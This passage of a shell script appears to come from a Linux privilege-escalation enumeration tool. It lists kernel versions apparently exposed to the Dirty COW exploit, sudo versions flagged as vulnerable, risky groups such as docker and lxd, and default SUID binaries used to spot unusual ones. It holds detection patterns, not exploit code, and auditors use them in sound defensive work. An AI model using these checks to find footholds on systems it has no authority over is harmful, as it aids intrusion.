-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic" +kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency" +kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic" +kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic" +kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" +kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" +kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5" +kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5" +kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5" +kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6" +kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6" +kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6" +kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" +kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7" + + +MyUID=`id -u $(whoami)` +if [ `echo $MyUID` ]; then myuid=$MyUID; elif [ `id -u $(whoami) 2>/dev/null` ]; then myuid=`id -u $(whoami) 2>/dev/null`; elif [ `id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1` ]; then myuid=`id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1`; fi +if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi +idB="euid|egid$baduid" +sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1" + +mounted=`(mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|'``cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}'` +if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty +mountG="swap|/cdrom|/floppy|/dev/shm" +notmounted=`cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|'`"ImPoSSssSiBlEee" +mountpermsB="\Wsuid|\Wuser|\Wexec" +mountpermsG="nosuid|nouser|noexec" + +rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService" + +groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)" +groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" +knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html +mygroups=`groups 2>/dev/null | tr " " "|"` + +# Default Binaries List +sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$" +sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$" +sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" 